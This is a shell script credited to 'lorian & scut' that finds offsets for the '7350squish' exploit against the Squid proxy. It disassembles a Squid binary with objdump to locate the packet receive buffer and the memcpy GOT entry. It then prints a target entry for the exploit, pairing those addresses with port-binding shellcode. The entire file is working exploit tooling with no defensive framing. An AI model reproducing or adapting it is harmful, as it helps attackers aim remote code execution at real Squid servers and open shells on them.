#!/bin/sh

# 7350squish offset finder
# lorian & scut

check_util ()
{
	for util in $*; do
		echo -n "checking for $util: "
		if ! which $util; then
			echo "not found, aborting"
			exit
		fi
	done
}

echo "7350squish exploit offset finder"
echo

if [ $# != 1 ]; then
	echo "usage: $0 /path/to/squid/binary"
	echo
	exit
fi;


check_util awk objdump

echo

bufferbase=`objdump -D $1 2>/dev/null | \
	grep "68 00 02 00 00" -A 1 | tail -1 | cut -d '$' -f2`

retaddr=`echo $bufferbase | awk 'function hex2num(s)
{
	n = length (s)
	v = 0
	for (i = 1; i < n-1; i++) {
		c = tolower(substr (s, i+2, 1));
		if (c=="a") c=10;
		if (c=="b") c=11;
		if (c=="c") c=12;
		if (c=="d") c=13;
		if (c=="e") c=14;
		if (c=="f") c=15;
		v = v * 16 + c;
	}
	return v
}
{
	printf ("0x%08x\n", hex2num ($0) + 144)
}'`

#retaddr=`echo $bufferbase | awk '{ printf ("0x%08x\n", $0 + 144) }'`

retloc=`objdump -R $1 2>/dev/null | \
	grep "memcpy$" | awk '{ printf ("0x%s", $1) }'`

echo "{ \"NEW TARGET\","
echo "x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,"
echo "$retloc, /* GOT: memcpy */"
echo "$retaddr, /* packet receive buffer + 0x90 */"
echo "0x0182, 288 },"
echo

echo finished.